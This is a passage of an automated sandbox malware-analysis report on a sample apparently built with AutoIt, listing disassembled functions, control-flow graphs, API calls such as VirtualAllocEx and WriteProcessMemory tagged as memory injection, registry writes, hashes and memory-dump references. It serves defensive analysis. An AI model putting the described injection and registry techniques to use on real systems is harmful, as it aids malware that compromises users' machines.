                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                            • Opcode ID: f4e6466004a85a9e6da26de091fa82b99ef77501c436c3a87ce8a4c6b33a114d
                                                                                                                                                                            • Instruction ID: 12101d9473541db97bfb34534c0e558dc25086d1af20d214f8feb4d1d5a098d8
                                                                                                                                                                            • Opcode Fuzzy Hash: f4e6466004a85a9e6da26de091fa82b99ef77501c436c3a87ce8a4c6b33a114d
                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0A030411A106B82216738AC8D8EA77EDFE46335B104711F975C63F0D7B0AD994695
                                                                                                                                                                            Function 00875078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0087504E,?,009198D8,0000000C,008751A5,?,00000002,00000000), ref: 00875099
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0087504E,?,009198D8,0000000C,008751A5,?,00000002,00000000), ref: 008750A0
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 008750B2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: 9dd0a2b45228dd19a387302230f5504e36d65d6d2e2e3e8cdde67c3e78922238
                                                                                                                                                                            • Instruction ID: 1cfc1a5e49d1917f74064bd5882a3b9ab1bef071f687a9c5feca47fc58b2f23f
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dd0a2b45228dd19a387302230f5504e36d65d6d2e2e3e8cdde67c3e78922238
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE0B631400A88AFCF216F58DD49E587B69FB41781F008014F8198B226DB76ED46DB91
                                                                                                                                                                            Function 008AE5F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 008AE60A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                            • String ID: X64
                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                            • Opcode ID: d39e609c06db27ac3b8a7ac9f662b7cde461cb921d5052d89b18390d1195a948
                                                                                                                                                                            • Instruction ID: 647b0bb1ecc4d897b4fe25643916dc0657eb8e33354d5f2219d7fec9c6bbb6e8
                                                                                                                                                                            • Opcode Fuzzy Hash: d39e609c06db27ac3b8a7ac9f662b7cde461cb921d5052d89b18390d1195a948
                                                                                                                                                                            • Instruction Fuzzy Hash: 56D0C9B480511DEACB90CBA0DCC8DDD737CFB24308F104551F506E6040DB3095488B10
                                                                                                                                                                            Function 01194EB2 Relevance: 3.0, APIs: 2, Instructions: 38memoryinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602090695.0000000001142000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            Function 01194EB2 Relevance: 3.0, APIs: 2, Instructions: 38memoryinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1602038320.00000000010FC000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 9187ae66f07eb2af1aaaf2bbbdfa9cb70fb798fa5172516f72a78c4b3b61434a
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            Function 01194EB2 Relevance: 3.0, APIs: 2, Instructions: 38memoryinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            Function 01194EB2 Relevance: 3.0, APIs: 2, Instructions: 38memoryinjectionCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0118CEB2), ref: 01194EC1
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE ref: 01194F0F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000003.1626317205.0000000001193000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
                                                                                                                                                                            • Associated: 00000007.00000003.1624407271.000000000118A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_3_10fc000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                                                            • Opcode ID: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction ID: 9b4d4f035cb201f6a19bd0ab2b7af7543f54026ee48b5f138524d0a1f9983f84
                                                                                                                                                                            • Opcode Fuzzy Hash: 5e79e9bfc78ee257bd3eb1cf3debc7ce1774875b02c80ed6b53c13afc4def554
                                                                                                                                                                            • Instruction Fuzzy Hash: 87F062B13802017FEB4E7BF08C06FB97B66BF55708F1400AEE6606E4E1DB666520D751
                                                                                                                                                                            Function 008DCD16 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 8dcd16-8dcd5a call 85bf07 * 3 7 8dcd5c-8dcd5f 0->7 8 8dcd65-8dcdd8 call 858e70 call 8dd6b1 call 8dd2f7 0->8 7->8 9 8dce64-8dce71 call 85e650 7->9 21 8dce08-8dce0d 8->21 22 8dcdda-8dcde8 8->22 16 8dd1ef-8dd212 call 85bd2c * 3 9->16 25 8dce7c 21->25 26 8dce0f-8dce24 RegConnectRegistryW 21->26 27 8dcded-8dcdfd 22->27 28 8dcdea 22->28 34 8dce80-8dceab RegCreateKeyExW 25->34 30 8dce76-8dce7a 26->30 31 8dce26-8dce43 call 857ab0 26->31 32 8dcdff 27->32 33 8dce02-8dce06 27->33 28->27 30->34 45 8dce48-8dce58 31->45 46 8dce45 31->46 32->33 35 8dce61-8dce63 33->35 36 8dcead-8dceca call 857ab0 34->36 37 8dcf0e-8dcf13 34->37 35->9 49 8dcecc 36->49 50 8dcecf-8dcede 36->50 42 8dcf19-8dcf42 call 858e70 call 874db8 37->42 43 8dd1d6-8dd1e7 RegCloseKey 37->43 59 8dcf44-8dcf91 call 858e70 call 874cf3 call 858e70 * 2 42->59 60 8dcf96-8dcfb9 call 858e70 call 874db8 42->60 43->16 47 8dd1e9-8dd1ed RegCloseKey 43->47 51 8dce5d 45->51 52 8dce5a 45->52 46->45 47->16 49->50 54 8dcee0 50->54 55 8dcee3-8dcef9 call 85e650 50->55 51->35 52->51 54->55 55->16 63 8dceff-8dcf09 RegCloseKey 55->63 85 8dd2bb-8dd2c7 RegSetValueExW 59->85 72 8dcfbf-8dd019 call 858e70 call 874cf3 call 858e70 * 2 RegSetValueExW 60->72 73 8dd047-8dd06a call 858e70 call 874db8 60->73 63->16 72->43 103 8dd01f-8dd042 call 857ab0 call 85e650 72->103 86 8dd156-8dd179 call 858e70 call 874db8 73->86 87 8dd070-8dd0d6 call 858e70 call 87019b call 858e70 call 85605e 73->87 85->43 89 8dd2cd-8dd2f2 call 857ab0 call 85e650 85->89 108 8dd17f-8dd19f call 85c92d call 858e70 86->108 109 8dd215-8dd238 call 858e70 call 874db8 86->109 124 8dd0d8-8dd0dd 87->124 125 8dd0f6-8dd128 call 858e70 RegSetValueExW 87->125 89->43 103->43 127 8dd1a1-8dd1b4 RegSetValueExW 108->127 128 8dd23a-8dd260 call 85c5df call 858e70 109->128 129 8dd265-8dd282 call 858e70 call 874db8 109->129 130 8dd0df-8dd0e1 124->130 131 8dd0e5-8dd0e8 124->131 137 8dd14a-8dd151 call 8701a4 125->137 138 8dd12a-8dd143 call 857ab0 call 85e650 125->138 127->43 133 8dd1b6-8dd1c0 call 857ab0 127->133 128->127 145 8dd1c5-8dd1cf call 85e650 129->145 153 8dd288-8dd2b9 call 8c276a call 858e70 call 8c27da 129->153 130->131 131->124 135 8dd0ea-8dd0ec 131->135 133->145 135->125 141 8dd0ee-8dd0f2 135->141 137->43 138->137 141->125 145->43 153->85
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DCE1C
                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(?,?,00000000,008EDCD0,00000000,?,00000000,?,?), ref: 008DCEA3
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 008DCF03
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008DCF53
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008DCFCE
                                                                                                                                                                            • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 008DD011
                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 008DD120
                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 008DD1AC
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 008DD1E0
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DD1ED
                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 008DD2BF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                            • Opcode ID: 1b83824601efea490a38c0404fdede851b6756ee46f17d9519320116104e78f0
                                                                                                                                                                            • Instruction ID: 83d51d03db20bd43efbe1229f4bb6b93e2960f69e3a084c39712153a209af471
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b83824601efea490a38c0404fdede851b6756ee46f17d9519320116104e78f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A1237752046019FDB15DF18C881A2AB7E5FF88714F14855EF89ADB3A2CB31ED49CB82
                                                                                                                                                                            Function 00853E15 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 163 853e15-853e45 call 87019b call 87016b 168 853e47-853e49 163->168 169 853e6e-853e80 call 87919b 163->169 171 853e4a-853e50 168->171 169->171 176 853e82-853e94 call 87919b 169->176 173 853e65-853e6b 171->173 174 853e52-853e62 call 87015d call 8701a4 171->174 174->173 182 894585-894587 176->182 183 853e9a-853eac call 87919b 176->183 182->171 186 89458c-89458f 183->186 187 853eb2-853ec4 call 87919b 183->187 186->171 190 894594-8945cb call 854154 call 854093 call 853fb8 call 874cf3 187->190 191 853eca-853edc call 87919b 187->191 223 894608-89460b 190->223 224 8945cd-8945d8 190->224 196 89462e-894633 191->196 197 853ee2-853ef4 call 87919b 191->197 196->171 201 894639-894655 call 86e2e5 196->201 206 894677-894688 call 8ba316 197->206 207 853efa-853f0c call 87919b 197->207 209 894662-89466a 201->209 210 894657-89465b 201->210 219 89468a-8946d2 call 85b25f * 2 call 855379 call 853aa3 call 85bd2c * 2 206->219 220 8946dc-8946e2 206->220 221 853f26 207->221 222 853f0e-853f20 call 87919b 207->222 209->171 215 894670 209->215 210->201 214 89465d 210->214 214->171 215->206 242 894704-894706 219->242 268 8946d4-8946d7 219->268 226 8946f5-8946ff call 8ba12a 220->226 231 853f29-853f2e call 85ad74 221->231 222->171 222->221 227 89460d-89461b 223->227 228 8945f6-894603 call 8701a4 223->228 224->223 225 8945da-8945e1 224->225 225->228 232 8945e3-8945e7 225->232 226->242 241 894620-894629 call 8701a4 227->241 228->226 238 853f33-853f35 231->238 232->228 239 8945e9-8945f4 232->239 244 8946e4-8946e9 238->244 245 853f3b-853f5e call 853fb8 call 854093 call 87919b 238->245 239->241 241->171 242->171 244->171 250 8946ef-8946f0 244->250 264 853fb0-853fb3 245->264 265 853f60-853f72 call 87919b 245->265 250->226 264->231 265->264 270 853f74-853f86 call 87919b 265->270 268->171 273 853f9c-853fa5 270->273 274 853f88-853f9a call 87919b 270->274 273->171 275 853fab 273->275 274->231 274->273 275->231
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                            • API String ID: 0-1645009161
                                                                                                                                                                            • Opcode ID: 409673c57743f1a04adb2e29c26a9f39bdc2efecbb68333e2a06c2ce89c10b45
                                                                                                                                                                            • Instruction ID: f8308577832e8e7f3685fba802c0bc362cc1d7bfc1c9ea01281acc7b90a33ff6
                                                                                                                                                                            • Opcode Fuzzy Hash: 409673c57743f1a04adb2e29c26a9f39bdc2efecbb68333e2a06c2ce89c10b45
                                                                                                                                                                            • Instruction Fuzzy Hash: BB81C271A40209BBDB11AF68DC43FAA3BA8FF15741F044024FD09EA186EB74DA59C762
                                                                                                                                                                            Function 0085EE07 Relevance: 21.6, APIs: 14, Instructions: 611windowsleeptimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetInputState.USER32 ref: 0085EEB7
                                                                                                                                                                            • timeGetTime.WINMM ref: 0085F0B7
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F1D8
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0085F22B
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0085F239
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F24F
                                                                                                                                                                            • Sleep.KERNELBASE(0000000A), ref: 0085F261
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2189390790-0
                                                                                                                                                                            • Opcode ID: de901c7bdb2b3ea32657ab0e5c0a8991294484d9479d7ae9e36b76dcf5dda1e6
                                                                                                                                                                            • Instruction ID: c48531ac75762be7fb46c72853a4411c9d9e0b591eb47c4e95542bb07905a079
                                                                                                                                                                            • Opcode Fuzzy Hash: de901c7bdb2b3ea32657ab0e5c0a8991294484d9479d7ae9e36b76dcf5dda1e6
                                                                                                                                                                            • Instruction Fuzzy Hash: 6832E070608741EFEB28CF24C844BAAB7E4FF82305F544529FA55CB292D771E948CB92
                                                                                                                                                                            Function 008535AB Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 008535DE
                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00853608
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00853619
                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00853636
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00853646
                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 0085365C
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0085366B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                            • Opcode ID: 1dbd434624a67f3309c80413d734a81e39638dc423ad561fe517fae96cb3c875
                                                                                                                                                                            • Instruction ID: 3914ffd829d71aebfa3d5a5692fe17a72283ce2836ae9b1dfa614bf76b6965db
                                                                                                                                                                            • Opcode Fuzzy Hash: 1dbd434624a67f3309c80413d734a81e39638dc423ad561fe517fae96cb3c875
                                                                                                                                                                            • Instruction Fuzzy Hash: 572127B5915358EFDB10DF94ED88B9DBBF4FB09700F00411AF610AA2A0D7B44689DF90
                                                                                                                                                                            Function 008909FB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 678 8909fb-890a2b call 8907cf 681 890a2d-890a38 call 87f656 678->681 682 890a46-890a52 call 8855b1 678->682 689 890a3a-890a41 call 87f669 681->689 687 890a6b-890ab4 call 89073a 682->687 688 890a54-890a69 call 87f656 call 87f669 682->688 697 890b21-890b2a GetFileType 687->697 698 890ab6-890abf 687->698 688->689 699 890d1d-890d23 689->699 700 890b2c-890b5d GetLastError call 87f633 CloseHandle 697->700 701 890b73-890b76 697->701 703 890ac1-890ac5 698->703 704 890af6-890b1c GetLastError call 87f633 698->704 700->689 715 890b63-890b6e call 87f669 700->715 706 890b78-890b7d 701->706 707 890b7f-890b85 701->707 703->704 708 890ac7-890af4 call 89073a 703->708 704->689 711 890b89-890bd7 call 8854fa 706->711 707->711 712 890b87 707->712 708->697 708->704 721 890bd9-890be5 call 89094b 711->721 722 890be7-890c0b call 8904ed 711->722 712->711 715->689 721->722 727 890c0f-890c19 call 888a3e 721->727 728 890c0d 722->728 729 890c1e-890c61 722->729 727->699 728->727 731 890c63-890c67 729->731 732 890c82-890c90 729->732 731->732 734 890c69-890c7d 731->734 735 890d1b 732->735 736 890c96-890c9a 732->736 734->732 735->699 736->735 737 890c9c-890ccf CloseHandle call 89073a 736->737 740 890cd1-890cfd GetLastError call 87f633 call 8856c3 737->740 741 890d03-890d17 737->741 740->741 741->735
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0089073A: CreateFileW.KERNELBASE(00000000,00000000,?,00890AA4,?,?,00000000,?,00890AA4,00000000,0000000C), ref: 00890757
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00890B0F
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00890B16
                                                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 00890B22
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00890B2C
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00890B35
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00890B55
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00890C9F
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00890CD1
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00890CD8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
